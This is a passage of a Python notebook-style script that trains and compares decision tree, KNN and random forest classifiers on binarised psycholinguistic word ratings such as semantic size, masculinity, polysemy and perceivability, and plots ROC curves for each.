linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not dominant','dominant'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not familiar","familiar"],
feature_names=X.columns,
max_depth=3,
fontsize=7)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
plt.savefig('plot_of_tree.pdf')
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
#ROC for Decision Tree (Gini)
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not familiar","familiar"],
feature_names=X.columns,
max_depth=3,
fontsize=7)
#KNN, find best score
acc = []
# Will take some time
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.accuracy_score(y_test, yhat))
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:,1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Semsize"""
refvar="semsize"
taglio=0.63
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['small','big'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["small","big"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average=None))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
#ROC for Decision Tree (Gini)
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
#KNN, find best score
acc = []
# Will take some time
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.accuracy_score(y_test, yhat))
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:,1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Masculinity"""
refvar="masculinity"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['feminine','masculine'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["feminine","masculine"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
#ROC for Decision Tree (Gini)
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
#KNN, find best score
acc = []
# Will take some time
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.accuracy_score(y_test, yhat))
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:,1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Polysemy"""
refvar="polysemy"
taglio=0.63
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not pol','pol'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not pol","pol"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
#ROC for Decision Tree (Gini)
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
#KNN, find best score
acc = []
# Will take some time
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.accuracy_score(y_test, yhat))
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:,1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Perceivability"""
refvar="perceivability"
taglio=0.8
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not peveivable','perveivable'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not perceivable","perceivable"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
#ROC for Decision Tree (Gini)
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
